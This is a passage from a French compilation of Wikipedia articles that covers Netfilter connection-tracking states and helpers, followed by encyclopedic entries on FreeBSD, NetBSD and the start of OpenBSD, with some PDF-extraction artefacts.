paquets seront obligatoirement défragmentés. Les connexions Netfilter peuvent être manipulées avec l'outil conntrack. Iptables peut inspecter les informations de connexion tels que les états, les statuts etc. pour rendre les règles de filtrage de paquets plus puissantes et plus faciles à gérer. Le plus souvent, les états sont les suivants : • “NEW” (nouveau) : le paquet essaie de créer une nouvelle connexion •• "ESTABLISHED" (établi) : le paquet fait partie d'une connexion déjà existante • "RELATED" (liée) : cet état est attribué à un paquet qui est l'ouverture d'une nouvelle connexion, et qui a été "attendu". Les mini-ALGs susmentionnés mettent ces attentes en place, par exemple, lorsque le module nf_conntrack_ftp voit une commande FTP "PASV". •• "INVALID" (invalide) : le paquet a été jugé invalide. La cause la plus fréquente est qu'il ne respecterait pas le diagramme d'état du protocole TCP. • "UNTRACKED" (non-suivant) : état spécial qui peut être attribué par l'administrateur pour contourner Connection Tracking (voir tableau raw ci-dessus) En pratique, le premier paquet que le sous-système conntrack perçoit est donc classé "nouveau". Le paquet de réponse est classé "établi". À l'inverse, une erreur ICMP est "liée", et un paquet d'erreur ICMP qui ne correspond à aucune connexion connue est catégorisé "invalide".

Connection Tracking aides Grâce à l'utilisation de modules de plugin, CT peut prendre connaissance des protocoles de la couche application, et donc comprendre que deux connexions distinctes ou plus sont "liées". Considérons, par exemple, le protocole FTP. Une connexion contrôle est établie, mais chaque fois que des données sont transférées, une connexion séparée est établie pour les transférer. Lorsque le module nf_conntrack_ftp est chargé, le premier paquet d'une connexion de données FTP sera classé comme "lié" à la place de "nouveau", comme il fait logiquement partie d'une connexion existante. Les aides n'inspectent qu'un paquet à la fois. Si des informations vitales pour CT sont divisées en deux paquets — en raison de la fragmentation IP ou de la segmentation TCP — l'aide ne reconnaitra pas nécessairement les modèles et ne saura donc pas s'acquitter de son fonctionnement. La fragmentation IPv4 est traitée avec le sous-système CT exigeant la défragmentation, même si la segmentation TCP n'est pas traitée. En cas de FTP, les paquets sont réputés ne pas être segmentés "près de" la commande PASV avec des tailles de secteur (MSS) et ne sont donc pas traités par Netfilter.

Notes et références [3] • (en) Cet article est partiellement ou en totalité issu de l’article de Wikipédia en anglais intitulé « Netfilter » ( voir [4] la liste des auteurs )

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Netfilter& action=edit& section=0

[2] http:/ / www. ssi. gouv. fr/ fr/ produits-et-prestataires/ produits-certifies-cspn/ certificat_cspn_2009_04. html

[3] http:/ / en. wikipedia. org/ wiki/ Netfilter?oldid=cur

[4] http:/ / en. wikipedia. org/ wiki/ Netfilter?action=history 238

7-Systèmes d'exploitation et pare-feu basés sur la sécurité

FreeBSD

Cet article ou cette section est à actualiser. [1] Des passages de cet article sont obsolètes ou annoncent des événements désormais passés. Améliorez-le ou discutez des points à vérifier.

Cet article ne cite pas suffisamment ses sources (janvier 2013). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

FreeBSD

Page d'accueil de FreeBSD

Famille BSD

Type de noyau Noyau monolithique modulaire

État du projet en développement

Plates-formes i386, x86-64, SPARC, SPARC64, ALPHA, AMD64, IA-64, PC98, PowerPC, ARM architecture

Entreprise / The FreeBSD Project Développeur

Licence Licence BSD

États des sources Open source

Dernière version stable [2] 9.1 (31 décembre 2012) //fr.wikipedia.org/w/index.php?title=Modèle:Dernière_version_stable/FreeBSD&action=edit +/−

Dernière version //fr.wikipedia.org/w/index.php?title=Modèle:Dernière_version_avancée/FreeBSD&action=edit +/− avancée

Site web [3] www.freebsd.org FreeBSD 239

[4] modifier

FreeBSD est un système d'exploitation UNIX libre. Le nom vient de l'association d'une part de free qui signifie à la fois « libre » et « gratuit » dans l'anglais courant, et d'autre part de Berkeley software distribution (BSD), l'UNIX développé à l'université de Berkeley. Free prend un sens plus connoté dans ce nom : il signifie que le logiciel peut être utilisé gratuitement même pour un usage commercial, que les sources complètes sont disponibles et utilisables avec un minimum de restrictions quant à leur usage, leur distribution et leur incorporation dans un autre projet (commercial ou non), et enfin que n'importe qui est libre de soumettre son code source pour enlever un bug ou améliorer le logiciel, ce code étant incorporé aux sources après accord. L'objectif du projet FreeBSD est de fournir un système qui peut servir à tout, avec le moins de restrictions possibles. Historiquement, les développeurs se sont focalisés pendant un temps sur la plate-forme i386 au sens large (x86) et les performances, c'est-à-dire les temps de réponses du système pour n'importe quelle sollicitation. En 2010, FreeBSD est utilisable et soutenu par la communauté sur un grand nombre de plates-formes : Alpha, AMD64, ARM, i386 (architecture i386 ou x86, incluant les Pentium), ia64 (la famille de processeurs Intel Itanium et Itanium 2), x86-64, MIPS, PC98 (architecture NEC PC-98x1), PowerPC, SPARC (architecture UltraSPARC de Sun Microsystem) et Xbox. FreeBSD offre des possibilités avancées en termes de réseau, de performance, de sécurité et de compatibilité. Il y a notamment une compatibilité binaire Linux et Windows NT (XP inclus). La première permet l'exécution de programmes compilés Linux, la seconde permet l'utilisation des pilotes Windows NT des cartes réseau sans fil Wi-Fi. Le logiciel est un standard industriel sur le marché des serveurs. De nombreux fournisseurs d'accès, hébergeurs et organismes utilisent FreeBSD, parmi lesquels Walnut Creek CDROM, Yahoo! Inc. ou Netcraft. Le 24 mai 1999, l'équipe du serveur miroir ftp.cdrom.com a annoncé avoir battu la veille leur record de transfert de données[5] pour un serveur : 1,33 tébioctets en 24 heures.

Histoire FreeBSD tire ses origines de l'UNIX de Berkeley. Beaucoup de l'organisation humaine, de l'idéologie et des événements du Computer Systems Research Group (en) (CSRG) sont restés dans FreeBSD et se transmettent. Le projet est lancé en 1993 sur la base de 386BSD, et la version 1.0 est disponible en production dès novembre 1993. L'équipe de Yahoo! cherche alors un système d'exploitation stable et performant. Ils le trouvent avec FreeBSD 2, qu'ils installent sur un Pentium 100 puis sur l'ensemble de leurs ordinateurs, comme le raconte David Filo[6], cofondateur de Yahoo! Depuis, l'hébergeur met à disposition plusieurs serveurs pour la communauté FreeBSD. FreeBSD 3 importe du code de 4.4BSD-Lite release 2, qui est la dernière publication faite par l'université de Californie Berkeley (UCB). FreeBSD devient particulièrement mûr et performant avec les versions 4, jusqu'à la dernière (4.11) parue en janvier 2005[7]. Une grande quantité de nouveautés apparaît avec les versions 5, mais Matthew Dillon, en désaccord avec d'autres membres de la core team (les développeurs dirigeants)[réf. souhaitée] décide de continuer la version 4 avec une nouvelle équipe sous le nom de DragonFly BSD. Parmi ces nouveautés, on compte : une architecture multiprocesseurs nouvelle génération (SMPng, Symmetrical Multi-Processor scheduler next generation) avec des temps de latences plus courts, la possibilité d'exécuter en mode kernel plusieurs programmes, le système de fichiers UFS2, un système de politiques de sécurité en provenance de Trusted BSD[8]. Les versions 6 apparaissent en novembre 2005. Elles continuent entre autres le travail sur le système SMP (Symmetrical Multi-Processor scheduler), les threads, et la sécurité. Le système de fichiers est maintenant multi-threadé, et les processeurs 386 ne sont plus gérés. Il y a trois releases (publications) en 2006 et une en 2007. FreeBSD 240

La version 7.0 sort le 27 février 2008[9] et la 8.0 en novembre 2009[10]. Parmi les nouveautés importantes figure le nouvel ordonnanceur, SCHED_ULE, optimisé pour les machines multiprocesseurs sans diminution des performances en monoprocesseur. Cette version a néanmoins été critiquée pour l'intégration tardive de la propolice au sein du kernel[11].

Développement Beaucoup est resté de l'époque Berkeley Software Distribution et du CSRG avec, entre autres, de grandes parties des sources, des sources sont publiées avec le système, des décisions prises par un groupe réduit de développeurs. Les développeurs sont dispersés dans le monde entier. Les sources de toutes les branches depuis la version 2.2 jusqu'aux dernières expérimentations de CURRENT sont en permanence disponibles sur les serveurs. Il est même possible de télécharger les sources d'une branche telles qu'elles étaient à une date précise.

L'équipe Le développement se fait d'une manière assez hiérarchisée. La core team rassemble des développeurs élus qui décident de l'évolution générale de FreeBSD. Ils sont actuellement neuf, et on compte 29 anciens (depuis 1992) qui continuent à contribuer. Les élections se tiennent tous les deux ans ; la dernière (en 2009) s’est déroulée en juillet 2008[12]. Les autres équipes sont responsables de : •• la sécurité (sept membres) ; • des releases (une équipe principale et autant d'équipes que de plates-formes) ; •• de la documentation ; •• de la gestion des ports ; •• des dons. Certains développeurs font partie de plusieurs équipes, par exemple core team et release engineering team. FreeBSD compte en novembre 2006 : • environ 370 développeurs (dont les membres de la core team) qui ont accès en écriture aux sources officielles ; ce sont les FreeBSD committers, terme venant de la commande commit du programme CVS (Concurrent Version System), qui permet de transmettre les modifications sur le serveur central ; •• 1905 contributeurs sans privilège ; •• un certain nombre d'utilisateurs et testeurs, parmi lesquels des individus, des organismes, des fournisseurs d'accès et des hébergeurs en général. Il y a régulièrement des importations et exportations de code entre les systèmes BSD (FreeBSD, NetBSD, OpenBSD, DragonFly BSD). Par conséquent, les développeurs BSD en général participent au code des BSD. Il y a plusieurs raisons à cela : tous ont pour ancêtre commun 4.4BSDLite et ont une architecture proche - en moyenne bien plus que deux distributions Linux, et tous ont la même licence BSD. D'autres licences proches comme celle de Solaris permettent également des flux de code. Dtrace, un outil Solaris qui permet de voir d'une manière arbitraire tout ce qui se passe dans le système, est ainsi en train d'être porté sur FreeBSD : • Devon O'Dell a commencé une grande partie du travail[13] ; •• John Birrell principalement le continue : • l’avancement peut être suivi sur la page du projet[14], •• fin mai 2006, 793 sur 1039 tests que DTrace réalise sous Solaris, réussissent sous FreeBSD. Apple a utilisé une grande partie du système version 5, et a participé en retour à l'ajout de fonctionnalités[15]. Il y a donc une communauté de développeurs FreeBSD - au sens large - très importante. FreeBSD 241

L'organisation FreeBSD a trois étiquettes pour les sources : •• HEAD, version en développement sans restriction (version 7 jusqu'à l'été 2007) ; •• RELENG_x, version en développement mais à l'architecture fixée ; •• RELENG_x_y, version de production mise à jour. Au numéro x correspond donc une architecture ou une branche. Au numéro y correspond une release. Tous les quatre à six mois, les sources d'une branche sont gelées pour préparer une release, étiquetée RELEASE. Pour un système compilé : •• HEAD devient CURRENT ; •• RELENG_x devient FreeBSD-x-STABLE ; •• RELENG_x_y devient FreeBSD-x.y-RELEASE au moment de la release, et FreeBSD-x.y-RELEASE-p1, puis p2, etc avec les mises à jour. Pour un système FreeBSD de production, les FreeBSD-x.y-RELEASE-pz sont les mieux indiqués. FreeBSD-CURRENT est tout à fait expérimental[16] et contient des fonctionnalités qui ne sont que susceptibles d'être présentes dans la prochaine branche. Les personnes qui utilisent FreeBSD-CURRENT sont : •• les développeurs actifs qui travaillent de manière spécialisée sur les sources ; •• les testeurs de la communauté qui participent à l'assainissement de FreeBSD-CURRENT, qui proposent aussi des directions d'évolution de FreeBSD, ainsi que des patches (portions de code source) ; •• les personnes qui plutôt suivent l'évolution de FreeBSD, ce qui peut être une activité à plein temps, et éventuellement proposent des patches. L'organisation du développement et de la communauté fait que le support de FreeBSD est très réactif, notamment en matière de sécurité. Quelques minutes ou heures en général séparent la découverte d'une faille dans la sécurité et le moment où les sources sont corrigées sur le serveur principal.

Le système FreeBSD est un système d'exploitation à part entière qui comprend le noyau, une partie utilisateur, et les sources. Les programmes ne faisant pas partie de FreeBSD comme Apache et Firefox sont dans le système de ports. Les logiciels importants comme le serveur graphique X11, les gestionnaires de fenêtres comme FluxBox et les environnements de bureau tel que KDE sont intégrés comme packages (port précompilé) dans les cédéroms de publication de FreeBSD. FreeBSD est publié en grande majorité sous licence BSD, et sous licence GPL (GNU General Public Licence). Les sources protégées par la licence GPL sont dans un répertoire séparé.

Les « ports » Il s'agit d'une des grandes forces de FreeBSD. Chaque port est un ensemble de fichiers informatifs précisant où trouver les sources d'une application, éventuellement quelles corrections apporter, comment compiler, et quels sont les programmes ou bibliothèques dont l'application dépend (ces programmes et bibliothèques sont simplement appelées dépendances). Par extension, un port est une application portée sur FreeBSD. À l'été 2008, il y a plus de 17 000 ports. Chaque port peut être installé sous forme binaire ou package (système équivalent aux fichiers .rpm, .deb, etc. des distributions Linux) ou compilé depuis les dernières sources (équivalent des pkgsrc de NetBSD). Le système est fait de telle manière qu'avec une seule commande, les sources de l'application et des dépendances sont téléchargées, compilées et installées sur le système d'exploitation. FreeBSD 242

Depuis 2008, l'environnement Java de Sun Microsystems est disponible pour les plates-formes i386 et AMD64 (Java Runtime Environment/JRE et Java Development Kit/JDK) en version 1.6. La fondation FreeBSD a négocié une licence auprès de Sun Microsystems pour une distribution précompilée de cet environnement.

Projets associés et personnalisations de FreeBSD • TrustedBSD [17] est créé en 2000 par Robert Watson, membre de la core team. Il s'agit d'un ensemble d'extensions de FreeBSD et a pour tâche de développer des services de sécurité et d'audit du code source. Régulièrement des éléments de TrustedBSD sont intégrés à FreeBSD. • (en) NanoBSD [18] fait partie de FreeBSD. C'est un système FreeBSD de taille très réduite pour un usage spécialisé. • PC-BSD est une release 6.1 personnalisée avec une interface d'installation "plus facile". • DesktopBSD [19] est une autre personnalisation de FreeBSD qui se focalise sur une utilisation de bureau, opposée à une utilisation comme serveur. • FreeNAS est une distribution qui permet d'utiliser un ordinateur pour réaliser du stockage en réseau NAS. Trois cédéroms avec système utilisable sans installation sur disque dur (LiveCD) existent : d'une part FreeSBIE du groupe italien GUFI [20],Frenzy BSD, un projet russe documenté en français (Frenzy en français [21]), ainsi que le récent GhostBSD [22].

Pénétration des marchés FreeBSD est considéré comme un standard industriel dans le marché des serveurs. Il n'y a pas de données maintenues sur les utilisateurs du système d'exploitation, mais des organismes d'observation comme Netcraft (qui a tous ses serveurs sous FreeBSD) permettent d'effectuer des évaluations qualitatives. De grandes parties d'internet (Netblock owners) sont sous FreeBSD : •• Yahoo!, qui comprend HotJobs.com Ltd, Altavista ou Geocities ; •• Rackspace.com ; •• Isle, Inc ; •• Bayerischer Rundfunk ; •• Japan Network Information Center ; •• ViaNet Communications ; •• Hopemoon Co, Ltd ; •• Full Internet Provider. D'anciens utilisateurs (ou actuels mais non confirmés) de FreeBSD sur serveurs sont : • Microsoft (hotmail)[23],[24]. L'utilisation de FreeBSD pour un usage domestique, sans être confidentielle, est bien plus modérée auprès du grand public que le système GNU/Linux. Pourtant, FreeBSD fait fonctionner les logiciels qui ont largement aidé à populariser les systèmes GNU/Linux, parmi lesquels le serveur graphique X associé à l'espace bureautique et de fenêtrage KDE, la suite bureautique OpenOffice.org, le navigateur web Firefox. D'autres facteurs entrent en jeu. Sans prétention d'exhaustivité, de hiérarchie quant à l'impact, il y a vraisemblablement : • la médiatisation, à laquelle ont participé de grandes entreprises comme IBM, Microsoft, Novell ou RedHat, des organismes d'état et les différents médias qui relayent les sujets sélectionnés ; • une synergie entre des mouvements : logiciel-libre, un contre courant par rapport à Microsoft et aux solutions propriétaires ; FreeBSD 243

• la licence : parfois jugée trop libre, elle permet à des entreprises comme Apple ou Microsoft d'intégrer du code FreeBSD à leur système d'exploitation. Sans être décisif, un logo ou un slogan est un porte parole qui par la répétition et la force de l'image aident à marquer les esprits.

Le daemon BSD (beastie) Le personnage rouge et souriant est le daemon BSD. Dans le contexte des systèmes UNIX, les daemons — d(isk) a(nd) e(xecution) mon(itor) — sont des programmes de maintenance travaillant en arrière plan et ne nécessitant pas d'intervention humaine. Si daemon était entre le milieu du XVIe siècle et le XIXe siècle l'orthographe d'usage pour demon, aujourd'hui ces deux termes diffèrent. Dans les anciennes croyances grecques daemon désignait une divinité, un être surnaturel, un génie ou ange gardien. En revanche demon (démon en français) a une connotation diabolique. Le terme daemon est réapparu dans les années 1980 avec les débuts d'UNIX, ce avec la même ancienne connotation grecque. Le daemon BSD à la fois revêt l'apparence d'un démon (avec les cornes, et la queue pointue) et incarne un daemon par son apparence bienveillante. Le daemon BSD s'appelle officiellement beastie, ce qui se prononce comme BSD en anglais. Le nom erroné de Chuck a été employé pendant un temps, à l'origine par Walnut Creek CD-ROM. John Lasseter (écurie Pixar, réalisateur et producteur de Toy Story et 1001 pattes) créa le premier l'image de beastie. Depuis 1988 les droits sur le daemon BSD sont détenus par Marshall Kirk McKusick, ancien développeur à l'UC Berkeley Computer Systems Research Group (CSRG). L'image de beastie ci-contre a été créée par Poul-Henning Kamp, ancien membre de la core team.

Comparaison avec GNU/Linux

Cet article doit être wikifié (mai 2010). La mise en forme de son texte ne suit pas les recommandations Wikipédia (style, typographie, liens internes, etc. – vérifier la page de discussion où ces motifs peuvent avoir été précisés). Téléchargez le guide de syntaxe et [1] modifiez !

Cette section ne cite pas suffisamment ses sources (mai 2010). Pour l'améliorer, ajouter en note des références vérifiables ou les modèles {{refnec}} ou {{refsou}} sur les passages nécessitant une source. FreeBSD et GNU/Linux sont deux systèmes de type Unix. Alors que FreeBSD tend à être entièrement conçu par une seule équipe, chaque composant de GNU/Linux est développé par une équipe différente. De cette manière la cohésion de ces composants est assurée d'office dans le cas de FreeBSD tandis que sous GNU/Linux elle se révèle très complexe, c'est pourquoi il existe des distributions GNU/Linux, qui sont des systèmes préassemblés dans le but d'être plus rapidement fonctionnel pour l'utilisateur. Entre les deux systèmes, la nomenclature des périphériques diffère, de même que quelques commandes, ou encore l'arborescence du système de fichiers. C'est typiquement le même genre de différences que l'on peut trouver entre deux distributions GNU/Linux très différentes. L'ensemble des distributions GNU/Linux étant très hétérogène, il est extrêmement difficile de le comparer à une seule entité. Cependant tout comme quelques distributions GNU/Linux, FreeBSD entend fournir un système simple, rapide, stable, sûr, à destination des utilisateurs qui ont déjà une bonne connaissance des systèmes informatiques (par exemple si lors de l'installation l'utilisateur a choisi d'installer un environnement graphique, il ne sera pas configuré automatiquement ni lancé au démarrage par défaut). À ce titre, FreeBSD se rapproche de Gentoo par exemple. FreeBSD est très loin de l'installation en quelques clic d'Ubuntu, qui est parfaitement fonctionnel fraîchement installé et déjà équipé de tous les logiciels de base pour une utilisation domestique. C'est ce que propose PC-BSD, un système FreeBSD pré-installé pour une utilisation bureautique, à l'image d'une distribution GNU/Linux. FreeBSD 244

De nombreux débats ont lieu sur la sécurité, les performances et diverses qualités de ces systèmes[25].

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=FreeBSD& action=edit

[2] http:/ / www. freebsd. org/ releases/ 9. 1R/ relnotes. html

[3] http:/ / www. freebsd. org/ fr/

[4] http:/ / fr. wikipedia. org/ w/ index. php?title=FreeBSD& action=edit& section=0

[5] Record de transfert de données (http:/ / www. bafug. org/ news/ NewRecord. html)

[6] Yahoo et FreeBSD (http:/ / www. viewtouch. com/ yahoobsd. html)

[7] Annonce de la sortie de FreeBSD 4.11 (http:/ / www. freebsd. org/ releases/ 4. 11R/ announce. html)

[8] trustedbsd.org (http:/ / www. trustedbsd. org/ )

[12] Communiqué : élections 2008 de la core team (http:/ / www. freebsd. org/ news/ newsflash. html)

[13] son blog (http:/ / www. sitetronics. com/ wordpress/ ?cat=8)

[14] Page du projet DTrace (http:/ / people. freebsd. org/ ~jb/ dtrace/ index. html)

[15] Grand Central Dispatch d'Apple sera porté sur FreeBSD (http:/ / www. appleinsider. com/ articles/ 09/ 10/ 16/

freebsd_adds_support_for_snow_leopards_grand_central_dispatch. html)

[16] FreeBSD-CURRENT contre FreeBSD-STABLE (http:/ / www. freebsd. org/ doc/ fr/ books/ handbook/ current-stable. html)

[17] http:/ / www. trustedbsd. org/

[18] http:/ / www. freebsd. org/ doc/ en_US. ISO8859-1/ articles/ nanobsd/ index. html

[19] http:/ / www. desktopbsd. net/

[20] http:/ / www. gufi. org

[21] http:/ / frenzy. org. ua/ fr

[22] http:/ / www. ghostbsd. org/

[23] Migrating Microsoft Hotmail from FreeBSD to Microsoft Windows 2000 Technical Case Study (http:/ / technet. microsoft. com/ en-us/

library/ bb496985. aspx)

[24] Appendices for Migrating Microsoft Hotmail from FreeBSD to Microsoft Windows 2000 Technical Case Study (http:/ / technet. microsoft.

com/ en-us/ library/ bb496986. aspx)

[25] http:/ / www. freesoftwaremagazine. com/ articles/ comparing_linux_and_freebsd NetBSD 245 NetBSD

NetBSD

NetBSD 3.1 avec Enlightenment

Famille BSD

Type de noyau Noyau monolithique

État du projet en développement

Entreprise / The NetBSD Foundation Développeur

Licence Licence BSD

États des sources Open source

Dernière version stable [1] 5.1 (19 novembre 2010) //fr.wikipedia.org/w/index.php?title=Modèle:Dernière_version_stable/NetBSD&action=edit +/−

Dernière version 6.0.1 (le 26 décembre 2012) avancée

Site web [2] www.netbsd.org

[3] modifier

NetBSD est un système d'exploitation libre de type Unix BSD dérivé de 386BSD et de Net/2 (4.3BSD-Lite).

Présentation

NetBSD est entièrement fondé sur des logiciels libres, la plupart des composants étant soumis à la Licence BSD. Le système détient le record sur le nombre d'architectures compatibles ; il peut en effet être utilisé sur plus de cinquante architectures filiation des systèmes Unix. différentes.

Cette portabilité est un point central du projet, si bien que sa devise est que face à tout ordinateur, on peut déclarer « Bien sûr, cela fonctionne avec NetBSD » (de l'anglais "Of course it runs NetBSD"). Pour l'anecdote, NetBSD a même déjà été porté sur un grille-pain[4]. NetBSD 246

Un autre aspect sur lequel le projet met fortement l'accent est la qualité du code écrit. Le projet vise à développer des solutions conceptuellement cohérentes. Une fonctionnalité relevant du bidouillage, même efficace, n'est donc pas satisfaisante de ce point de vue. Ici une phrase souvent mise en avant est « des solutions, pas du bidouillage » (de l'anglais "Solutions, not hacks") Le modèle de développement retenu pour le projet est assez centralisé. Il est qualifié de modèle cathédrale par opposition au modèle bazar. NetBSD est orienté vers une ergonomie privilégiant l'efficace à l'intuitif. Il est donc plus adapté à un public d'utilisateurs expérimentés, comme des administrateurs système ou des développeurs. Pour une utilisation plus grand public, comme la bureautique, NetBSD sera moins convivial et disposera d'un moins bon support des périphériques que d'autres systèmes, comme certaines distributions Linux. En revanche, toutes les interfaces du noyau et les pilotes sont documentées dans des pages man, et non dans des fichiers textes éparpillés en divers endroits. Enfin NetBSD fait de la rétro compatibilité un de ses chevaux de bataille, et avec un noyau intégrant l'option COMPAT_09, le système est capable d'exécuter des logiciels compilés dans un format binaire de 1993.

Organisation du projet NetBSD est organisé autour de la NetBSD foundation, une association à but non-lucratif dont sont membres les développeurs. Le code source de NetBSD est disponible sur internet via CVS et accessible en ligne via une interface cvsweb[5] Pour disposer d'un accès en commit sur le cvs de NetBSD, chaque développeur doit signer un accord d'agrément [6] qui le rend membre de la fondation NetBSD. Le conseil d'administration de la fondation NetBSD, élu par les développeurs, publie des rapports réguliers sur ses activités et sur les finances[7] du projet. NetBSD comporte 300 développeurs en 2006.

Histoire Le projet NetBSD a été fondé par Chris Demetriou (es), Theo de Raadt, Adam Glass et Charles Hannum en mars 1993. La formation du projet fait suite à la stagnation relative du développement et l'impossibilité de faire accepter des patchs externes dans 386BSD. En 1995 suite à un désaccord dans l'équipe de développement, d'anciens développeurs autour de Theo de Raadt créent OpenBSD. Ceux qui voudraient se faire un point de vue sur la question sont invités à prendre leur courage à deux mains et lire les archives des listes de diffusion où les coups se sont échangés pendant près de 8 mois. Les deux systèmes d'exploitation divergent dans un certain nombre de domaines, comme par exemple l'initialisation du système, mais restent cependant assez proches pour que le portage de pilotes de l'un à l'autre soit relativement facile. Ainsi les deux BSD utilisent tous deux le framework wscons[8], le même système de nomenclature de périphériques, et distribuent les mêmes shells dans le système de base.

Portabilité À partir de n'importe quelle installation de NetBSD, il est possible à partir d'une seule commande make, de reconstruire l'ensemble de la distribution NetBSD pour n'importe quelle architecture, compilateur compris. Il est même possible de compiler une distribution NetBSD depuis FreeBSD ou Linux. Ainsi il est possible à partir d'un système intel i386, de compiler très facilement un noyau pour PowerPC, Alpha, MIPS, le script de cross-compilation build.sh se chargeant lui-même de la compilation de toutes les dépendances requises. Ceci fait de NetBSD un système de choix pour le développement de systèmes embarqués (routeurs, firewalls, caméra video IP, et même robot[9],[10] et grille-pain[4]). NetBSD 247

Licence Article détaillé : Licence BSD. Historiquement, la majorité de NetBSD est disponible sous la licence BSD « traditionnelle » à quatre clauses. Depuis le 20 juin 2008, le projet utilise désormais une licence BSD à deux clauses.

Organisation du système NetBSD lui-même est un système de base minimal de 300 Mo comprenant les outils Unix traditionnels et l'environnement. Les applications externes sont disponibles via pkgsrc, un système de packages multi plateformes.

Versions de NetBSD NetBSD 0.8 remontant à avril 1993, cela en fait le système d'exploitation libre le plus ancien encore en activité. NetBSD 0.8 est basé sur un 386BSD considérablement patché. NetBSD 1.0 sorti en octobre 1994, est la première version multi plateforme de NetBSD, disponible pour PC, HP 9000 Series 300, Amiga, Macintosh 68k, stations Sun 4c et PC532. NetBSD 1.3 sorti en janvier 1998, a vu l'introduction du système de packages, pkgsrc, permettant l'installation facile et rapide d'applications externes à partir du code source ou sous forme de binaires précompilés. Pkgsrc est inspiré du système de ports de FreeBSD. NetBSD 1.6 sorti en septembre 2002, a vu l'introduction du framework de cross-compilation entre les différentes architectures. NetBSD 2.0 sorti en décembre 2004, a vu l'introduction du support SMP sur un grand nombre d'architectures, ainsi que la mise en place d'un système de distribution des images de CD-ROM via BitTorrent NetBSD 3.0.1 sorti le 23 juillet 2006. NetBSD 3.1 sorti le 4 novembre 2006, intègre le support natif pour la solution de virtualisation Xen. NetBSD 4.0 sorti le 19 décembre 2007. Les nouveautés comprennent le support de Xen en version 3, l'intégration du protocole CARP venant de OpenBSD, et deux nouveaux ports, NetBSD/landisk et NetBSD/ews4800mips. NetBSD 4.0.1 sorti le 14 octobre 2008. Il ne s'agit pas d'une nouvelle version, mais version corrective incluant de nombreux bug-fixes et mises à jour de sécurité. NetBSD 5.0 sorti le 29 avril 2009. Entre autres nouveautés, l'utilisation de Xorg et non plus de XFree86, le support du système de fichiers UDF ainsi que le support des processeurs multi-cores. NetBSD 5.0.1 NetBSD 248

sorti le 2 août 2009. Il s'agit de la première mise à jour de sécurité/fiabilité de la branche NetBSD 5.0-RELEASE. Elle comprend des correctifs relatifs à la sécurité et/ou à la stabilité de NetBSD. NetBSD 5.0.2 sorti le 12 février 2010. Il s'agit de la deuxième mise à jour de sécurité/fiabilité de la branche NetBSD 5.0-RELEASE. NetBSD 5.1 sorti le 19 novembre 2010. Elle améliore le support matériel principalement pour les périphériques réseau et de stockage (notamment les lecteurs de carte mémoire SD/MMC).

Critiques Des trois systèmes BSD, NetBSD est celui qui dispose du moins de visibilité. Avant 1998, il n'existait aucune distribution officielle de NetBSD sur CD-ROM, alors que FreeBSD et OpenBSD dès le départ ont utilisé ce canal de diffusion pour se faire connaître et générer des revenus. Les développeurs de NetBSD répondent que leur projet n'est pas un phénomène de mode ("hype free"), et qu'il est destiné à des utilisateurs ayant une bonne maitrise de l'outil informatique.

Notes et références

[1] http:/ / www. netbsd. org/ changes/ #netbsd-5-1

[2] http:/ / www. netbsd. org/

[3] http:/ / fr. wikipedia. org/ w/ index. php?title=NetBSD& action=edit& section=0

[5] CVSWeb de NetBSD (http:/ / cvsweb. netbsd. org)

[6] http:/ / www. netbsd. org/ developers/ agreement. txt

[7] Finances 2005 (http:/ / www. netbsd. org/ Foundation/ reports/ financial/ 2005. html)

[8] wscons (http:/ / netbsd. gw. com/ cgi-bin/ man-cgi?wscons+ + NetBSD-current) OpenBSD 249 OpenBSD

Cet article ne cite pas suffisamment ses sources (avril 2013). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

Cet article ou cette section ne s'appuie pas, ou pas assez, sur des sources secondaires ou tertiaires (avril 2013). Pour améliorer la vérifiabilité de l'article, merci de citer les sources primaires à travers l'analyse qu'en ont faite des sources secondaires [1] indiquées par des notes de bas de page (modifier l'article ).

OpenBSD

Logo

"Free, Functional & Secure"

Famille BSD

Type de noyau Monolithique

Plates-formes [2] Alpha, AMD64, armish, PA-RISC, i386, SH4, Loongson, macppc, sgi, Sparc, Sparc64, VAX, Zaurus et autres

Entreprise / The OpenBSD Project Développeur

Licence [3] [4] ISC , et compatibles BSD

Dernière version stable [5] 5.3 (1er mai 2013) //fr.wikipedia.org/w/index.php?title=Modèle:Dernière_version_stable/OpenBSD&action=edit +/−

Site web [6] www.openbsd.org

[7] modifier

OpenBSD est un système d'exploitation libre de type Unix, dérivé de 4.4BSD. Créé en 1994 par Theo de Raadt, il est issu de la séparation avec NetBSD, le plus ancien des trois autres principaux systèmes d'exploitation de la famille des BSD aujourd'hui en activité. Le projet OpenBSD est réputé pour son intransigeance sur la liberté du logiciel et du code source, la qualité de sa documentation, et l'importance accordée à la sécurité et la cryptographie intégrée. OpenBSD inclut un certain nombre de mesures de sécurité absentes ou optionnelles dans d'autres systèmes d'exploitation. Ses développeurs ont pour tradition de réaliser des audits de code à la recherche de problèmes de sécurité et de bogues. Le projet suit des politiques strictes sur les licences et préfère sa propre licence open source ISC et autres variantes de la licence BSD : dans le passé, ceci a conduit à un audit exhaustif des licences et des remplacements, voire des suppressions de codes sous licences considérées comme moins acceptables. OpenBSD 250

À l'instar de la plupart des systèmes d'exploitation basés sur BSD, le noyau d'OpenBSD et ses programmes utilisateurs, tels que le shell et les outils habituels comme cat et ps, sont développés dans un seul et même dépôt CVS. Les logiciels tiers sont offerts en paquets binaires ou peuvent être compilés depuis leurs sources grâce à la collection des ports. OpenBSD fonctionne ou a fonctionné sur 30 plates-formes matérielles différentes : •• 16 plates-formes matérielles prises en charge officiellement : • alpha, systèmes basés sur Digital Alpha; • amd64, processeurs AMD de la famille Athlon-64 en mode 64-bit ; • armish, appliances basées sur ARM (par Thecus, IO-DATA, et d'autres) ; • hppa, systèmes Hewlett-Packard Precision Architecture (PA-RISC) ; • i386, PC standards et clones basés sur les architectures Intel i386 et les processeurs compatibles ; • landisk, systèmes Landisk IO-DATA (comme le USL-5P) à base de processeur SH4 ; • Loongson, systèmes basés sur le Loongson 2E- et 2F-, comme le Lemote Fuloong et Yeeloong, Gdium Liberty, etc ; •• luna88k, stations de travail Omron LUNA-88K et LUNA-88K2 ; • macppc, machines Apple New World 